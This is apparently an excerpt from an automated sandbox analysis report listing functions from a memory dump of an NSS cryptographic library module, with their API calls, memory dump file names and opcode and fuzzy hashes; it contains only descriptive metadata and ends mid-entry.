Opcode ID: 69ca19ae6acd9fcdd83e9c9e70c2fdf771b3e6818b41f96003ec884cb2abef4b
Instruction ID: c0e8acc61fa693274a57e4efe1c2dcc8b00906577639079e01a81067dc60c368
Opcode Fuzzy Hash: 69ca19ae6acd9fcdd83e9c9e70c2fdf771b3e6818b41f96003ec884cb2abef4b
Instruction Fuzzy Hash: 43012CB56012109BDB00DF25ECC0B46BBB8AB58B59F1880A8E9498F746D735E849CBA1

Function 6C4D9C60 Relevance: 7.8, APIs: 6, Instructions: 262COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C4D9CF2
LeaveCriticalSection.KERNEL32(?), ref: 6C4D9D45
EnterCriticalSection.KERNEL32(?), ref: 6C4D9D8B
LeaveCriticalSection.KERNEL32(?), ref: 6C4D9DDE

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 70bc2aa8f8b7182b873051ec00c11b4e7dde44fc08e4dc31408c50ed11dcc960
Instruction ID: 2012600971813772b5a1fec3b30e9925c3106eeb080152eec98f968ac008b2eb
Opcode Fuzzy Hash: 70bc2aa8f8b7182b873051ec00c11b4e7dde44fc08e4dc31408c50ed11dcc960
Instruction Fuzzy Hash: C9A18B317001019BDB08EF66E8E9F6E3771BB96706F19012DD4068BB40DF3AB846CB86

Function 6C561E70 Relevance: 7.7, APIs: 5, Instructions: 207COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3(?), ref: 6C561ECC

Part of subcall function 6C609090: TlsGetValue.KERNEL32 ref: 6C6090AB
Part of subcall function 6C609090: TlsGetValue.KERNEL32 ref: 6C6090C9
Part of subcall function 6C609090: EnterCriticalSection.KERNEL32 ref: 6C6090E5
Part of subcall function 6C609090: TlsGetValue.KERNEL32 ref: 6C609116
Part of subcall function 6C609090: LeaveCriticalSection.KERNEL32 ref: 6C60913F

TlsGetValue.KERNEL32 ref: 6C561EDF
EnterCriticalSection.KERNEL32(?), ref: 6C561EEF
PR_ExitMonitor.NSS3(?), ref: 6C561F37
PR_Unlock.NSS3(?), ref: 6C561F44

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Value$CriticalEnterSection$Monitor$ExitLeaveUnlock
String ID:
API String ID: 3539092540-0
Opcode ID: 04e6a1bad9ffebd6c23d7ef192dc6e0d14da91bcf20a40a2b7137b1ba133733c
Instruction ID: 1bf9ec8cfa4580a34590a34a192b7fa73289c26b641a23a09186abeff6d0438f
Opcode Fuzzy Hash: 04e6a1bad9ffebd6c23d7ef192dc6e0d14da91bcf20a40a2b7137b1ba133733c
Instruction Fuzzy Hash: 97717AB29043019FD710CF26DC40A6BFBF5BF89358F144929E89997B21E731E958CB92

Function 6C5EDD70 Relevance: 7.7, APIs: 5, Instructions: 179COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C5EDD8C
LeaveCriticalSection.KERNEL32(00000000), ref: 6C5EDDB4
LeaveCriticalSection.KERNEL32(00000000), ref: 6C5EDE1B
ReleaseSemaphore.KERNEL32(?,00000001,00000000), ref: 6C5EDE77

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: CriticalLeaveSection$ReleaseSemaphoreValue
String ID:
API String ID: 2700453212-0
Opcode ID: f76efc249e62cfb2cd799e5a34783cc6f8d32f4e9e1d6c1cc5382f878c0cc9f5
Instruction ID: 6ccdc427c0b3c5c6bbb74a884be4f9ef7e04082f25242f75e04cac622858b9a9
Opcode Fuzzy Hash: f76efc249e62cfb2cd799e5a34783cc6f8d32f4e9e1d6c1cc5382f878c0cc9f5
Instruction Fuzzy Hash: 49718671A00319CFDB10CF9AC9C469AB7B4FF89718F25816DD9596B702D770A901CF90

Function 6C55DFA0 Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

Part of subcall function 6C55AB10: DeleteCriticalSection.KERNEL32(D958E852,6C561397,5B5F5EC0,?,?,6C55B1EE,2404110F,?,?), ref: 6C55AB3C
Part of subcall function 6C55AB10: free.MOZGLUE(D958E836,?,6C55B1EE,2404110F,?,?), ref: 6C55AB49
Part of subcall function 6C55AB10: DeleteCriticalSection.KERNEL32(5D5E6C75), ref: 6C55AB5C
Part of subcall function 6C55AB10: free.MOZGLUE(5D5E6C69), ref: 6C55AB63
Part of subcall function 6C55AB10: DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6C55AB6F
Part of subcall function 6C55AB10: free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6C55AB76

TlsGetValue.KERNEL32(?,?,6C55B266,6C5615C6,?,?,6C5615C6), ref: 6C55DFDA
EnterCriticalSection.KERNEL32(?,?,?,6C55B266,6C5615C6,?,?,6C5615C6), ref: 6C55DFF3
PK11_IsFriendly.NSS3(?,?,?,?,6C55B266,6C5615C6,?,?,6C5615C6), ref: 6C55E029
PK11_IsLoggedIn.NSS3 ref: 6C55E046

Part of subcall function 6C568F70: PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C55DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C568FAF
Part of subcall function 6C568F70: PR_Now.NSS3(?,?,00000002,?,?,?,6C55DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C568FD1
Part of subcall function 6C568F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C55DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C568FFA
Part of subcall function 6C568F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C55DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C569013
Part of subcall function 6C568F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C55DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C569042
Part of subcall function 6C568F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C55DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C56905A
Part of subcall function 6C568F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C55DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C569073
Part of subcall function 6C568F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C55DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C569111

PR_Unlock.NSS3(?,?,?,?,6C55B266,6C5615C6,?,?,6C5615C6), ref: 6C55E149

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: CriticalSection$DeleteEnterK11_UnlockValuefree$FriendlyInternalLoggedSlot
String ID:
API String ID: 4224391822-0
Opcode ID: a11a6f3d590cdc5750111164b404985bb82c05b27612c4bfe3a673a11a3da60b
Instruction ID: d8de3bbc21cc65746f248253e45e1b6d9cda6a97477a5273276ca2d4ef2e376d
Opcode Fuzzy Hash: a11a6f3d590cdc5750111164b404985bb82c05b27612c4bfe3a673a11a3da60b
Instruction Fuzzy Hash: A6516870600611CFDB10DF29C98476ABBF0BF84318F55886ED8998BB51E775E894CBD2

Function 6C56BE90 Relevance: 7.6, APIs: 5, Instructions: 141COMMON

Download Yara Rule

APIs

SEC_ASN1EncodeItem_Util.NSS3(00000000,00000000,?,?), ref: 6C56BF06
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C56BF56
PR_SetError.NSS3(FFFFE005,00000000,?,?,6C549F71,?,?,00000000), ref: 6C56BF7F
CERT_DestroyCertificate.NSS3(00000000), ref: 6C56BFA9
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C56C014

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Item_Util$Zfree$CertificateDestroyEncodeError
String ID:
API String ID: 3689625208-0
Opcode ID: 01e8e2881fe698db7ba3ec14857934cc29a8a8bb0179d4a32b6e8d39df33f09b
Instruction ID: 2fcb969b23032dd5ffeb0940d2ba1f8b59b3244302da5e2bbeb810f033ca98e1
Opcode Fuzzy Hash: 01e8e2881fe698db7ba3ec14857934cc29a8a8bb0179d4a32b6e8d39df33f09b
Instruction Fuzzy Hash: 9941D271B012019BEB00EE67DC80BAEB3B9AF84208F104129E919D7F61FB31EC45CB91

Function 6C53EDE0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C53EDFD
calloc.MOZGLUE(00000001,00000000), ref: 6C53EE64
PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6C53EECC
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C53EEEB
free.MOZGLUE(?), ref: 6C53EEF6

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: ErrorValuecallocfreememcpy
String ID:
API String ID: 3833505462-0
Opcode ID: 50a87380ac5a7d27465ccec1b6b94b411922ecf344a06351a742290afd82cefa
Instruction ID: 257603166c8b739cfe0d65ef716d7090af59dfd32df1078c2114e1f8370f97f9
Opcode Fuzzy Hash: 50a87380ac5a7d27465ccec1b6b94b411922ecf344a06351a742290afd82cefa
Instruction Fuzzy Hash: A231F7716002219BDB209F2ADC84B667BF4FB46704F141529E85E87B90F771EC14C7E5

Function 6C551F10 Relevance: 7.6, APIs: 5, Instructions: 96COMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C551F1C

Part of subcall function 6C5A0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5487ED,00000800,6C53EF74,00000000), ref: 6C5A1000
Part of subcall function 6C5A0FF0: PR_NewLock.NSS3(?,00000800,6C53EF74,00000000), ref: 6C5A1016
Part of subcall function 6C5A0FF0: PL_InitArenaPool.NSS3(00000000,security,6C5487ED,00000008,?,00000800,6C53EF74,00000000), ref: 6C5A102B

SEC_ASN1EncodeItem_Util.NSS3(00000000,0000000100000017,FFFFFFFF,6C669EBC), ref: 6C551FB8
SEC_ASN1EncodeItem_Util.NSS3(6C669E9C,?,?,6C669E9C), ref: 6C55200A
PR_SetError.NSS3(FFFFE022,00000000), ref: 6C552020

Part of subcall function 6C546A60: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C54AD50,?,?), ref: 6C546A98

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C552030

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Util$ArenaArena_EncodeItem_$Alloc_ErrorFreeInitLockPoolcalloc
String ID:
API String ID: 1390266749-0
Opcode ID: f471665ddbe7863d7a2849941c83eab9dc6d313bbcf77e7b46c0db442e8afcf4
Instruction ID: 103edde8f2489dc0ce091fb7ee83b12e610e63475b22661b00a8c4b4a7a7e0df
Opcode Fuzzy Hash: f471665ddbe7863d7a2849941c83eab9dc6d313bbcf77e7b46c0db442e8afcf4
Instruction Fuzzy Hash: 6921D775901501ABEB018E55DC40FAB7B68FF8531CF540616E82996F90E732F939CBB1

Function 6C541DD0 Relevance: 7.6, APIs: 5, Instructions: 81timeCOMMON

Download Yara Rule

APIs

DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C541E0B
DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C541E24
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C541E3B
PR_SetError.NSS3(FFFFE00B,00000000), ref: 6C541E8A
PR_SetError.NSS3(FFFFE00B,00000000), ref: 6C541EAD

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Error$Choice_DecodeTimeUtil
String ID:
API String ID: 1529734605-0
Opcode ID: 9c877cd4cca1d70594b7fc08f52a86d42af25f6d90fe2680beec717f44fce53e
Instruction ID: 5015dcdc56dc60e0609bcaa4edcaa90aafd3ab217bb1327213695cbb1226581c
Opcode Fuzzy Hash: 9c877cd4cca1d70594b7fc08f52a86d42af25f6d90fe2680beec717f44fce53e
Instruction Fuzzy Hash: 3B21D37AE04315A7D7008E69DC40F9B7B949BC5368F148638ED695B780E730DD2987D2

Function 6C561850 Relevance: 7.6, APIs: 5, Instructions: 76COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3(?,?,6C56002B,?), ref: 6C561875

Part of subcall function 6C609090: TlsGetValue.KERNEL32 ref: 6C6090AB
Part of subcall function 6C609090: TlsGetValue.KERNEL32 ref: 6C6090C9
Part of subcall function 6C609090: EnterCriticalSection.KERNEL32 ref: 6C6090E5
Part of subcall function 6C609090: TlsGetValue.KERNEL32 ref: 6C609116
Part of subcall function 6C609090: LeaveCriticalSection.KERNEL32 ref: 6C60913F

TlsGetValue.KERNEL32(?,?,6C56002B,?), ref: 6C56188E
EnterCriticalSection.KERNEL32(?,?,?,6C56002B,?), ref: 6C5618A7
PR_ExitMonitor.NSS3(?,?,?,?,6C56002B,?), ref: 6C561905
PR_Unlock.NSS3(?,?,?,?,6C56002B,?), ref: 6C561912

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Value$CriticalEnterSection$Monitor$ExitLeaveUnlock
String ID:
API String ID: 3539092540-0
Opcode ID: da9abf44c0041ee60d3a42ef1d9d006bf3245eaf719f0a593d2b6a1a35ae4a65
Instruction ID: 6a46bbb81a5a61af1cf5dceb400b4451aed7772a54f973bfdecef39fd241c25f
Opcode Fuzzy Hash: da9abf44c0041ee60d3a42ef1d9d006bf3245eaf719f0a593d2b6a1a35ae4a65
Instruction Fuzzy Hash: C1212E749046059BD700EF7AC98466AB7B4FF06358F114A29D895C7F20E730E894CBD2

Function 6C651E40 Relevance: 7.6, APIs: 5, Instructions: 75threadCOMMON

Download Yara Rule

APIs

PR_GetCurrentThread.NSS3 ref: 6C651E5C

Part of subcall function 6C609BF0: TlsGetValue.KERNEL32(?,?,?,6C650A75), ref: 6C609C07

PR_Lock.NSS3(00000000), ref: 6C651E75
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C651EAB
PR_GetCurrentThread.NSS3 ref: 6C651ED0
PR_Unlock.NSS3(?), ref: 6C651EE8

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: CurrentThread$ErrorLockUnlockValue
String ID:
API String ID: 121300776-0
Opcode ID: 572c2e2395ab17d2b26b4df7a0da00ec02019020840a1c038c36f5b4bfbd09eb
Instruction ID: aaf9f515fabc10ab33abfe812c5c667d7493fbe340f8bb8438ec0542d0eb67da
Opcode Fuzzy Hash: 572c2e2395ab17d2b26b4df7a0da00ec02019020840a1c038c36f5b4bfbd09eb
Instruction Fuzzy Hash: 0521CF74B04612EBD704CF19D980A46B7B1FF84728B758229D8159BB41D330FC22CBD9

Function 6C59BE60 Relevance: 7.6, APIs: 5, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C54E708,00000000,00000000,00000004,00000000), ref: 6C59BE6A

Part of subcall function 6C5A0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C5A08B4

SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C5504DC,?), ref: 6C59BE7E

Part of subcall function 6C59FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C598D2D,?,00000000,?), ref: 6C59FB85
Part of subcall function 6C59FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C59FBB1

SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C59BEC2
PR_SetError.NSS3(FFFFE006,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C5504DC,?,?), ref: 6C59BED7
SECITEM_AllocItem_Util.NSS3(?,?,00000002,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C59BEEB

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Util$Item_$CopyError$AllocAlloc_ArenaFindTag_memcpy
String ID:
API String ID: 1367977078-0
Opcode ID: f1b67ade3d5cf8085e025b4fa9cc4ed7ec3452d35d0e67ef7d4996e844efd303
Instruction ID: 5910d12f1a604a030950f349481fbb30ca5afb134cd287a80f099c6e7e6061c9
Opcode Fuzzy Hash: f1b67ade3d5cf8085e025b4fa9cc4ed7ec3452d35d0e67ef7d4996e844efd303
Instruction Fuzzy Hash: 1B112376A042D5A7F720EA66AC80F6B736D9B81758F0441A5FE0687B52F731DC0887F1

Function 6C54AD90 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(00000000,?,6C543FFF,00000000,?,?,?,?,?,6C541A1C,00000000,00000000), ref: 6C54ADA7

Part of subcall function 6C5A14C0: TlsGetValue.KERNEL32 ref: 6C5A14E0
Part of subcall function 6C5A14C0: EnterCriticalSection.KERNEL32 ref: 6C5A14F5
Part of subcall function 6C5A14C0: PR_Unlock.NSS3 ref: 6C5A150D

PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6C543FFF,00000000,?,?,?,?,?,6C541A1C,00000000,00000000), ref: 6C54ADB4

Part of subcall function 6C5A10C0: TlsGetValue.KERNEL32(?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A10F3
Part of subcall function 6C5A10C0: EnterCriticalSection.KERNEL32(?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A110C
Part of subcall function 6C5A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A1141
Part of subcall function 6C5A10C0: PR_Unlock.NSS3(?,?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A1182
Part of subcall function 6C5A10C0: TlsGetValue.KERNEL32(?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A119C

SECITEM_CopyItem_Util.NSS3(00000000,?,6C543FFF,?,?,?,?,6C543FFF,00000000,?,?,?,?,?,6C541A1C,00000000), ref: 6C54ADD5

Part of subcall function 6C59FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C598D2D,?,00000000,?), ref: 6C59FB85
Part of subcall function 6C59FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C59FBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C6694B0,?,?,?,?,?,?,?,?,6C543FFF,00000000,?), ref: 6C54ADEC

Part of subcall function 6C59B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6718D0,?), ref: 6C59B095

PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C543FFF), ref: 6C54AE3C

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
String ID:
API String ID: 2372449006-0
Opcode ID: 5966d4cacae18d22c6c1cfe7e8866cf76da47d5b0fa28c0d9ec21b81d2853e4c
Instruction ID: 88811af9170ae68082161db24623ee39f98c3cdd379a2eb136fcdfba8327195f
Opcode Fuzzy Hash: 5966d4cacae18d22c6c1cfe7e8866cf76da47d5b0fa28c0d9ec21b81d2853e4c
Instruction Fuzzy Hash: 87112671E003159BE7109B669C40BBF73A8DF9524CF048638EC6996741FB20E96986A2

Function 6C59F860 Relevance: 7.6, APIs: 5, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C59F893

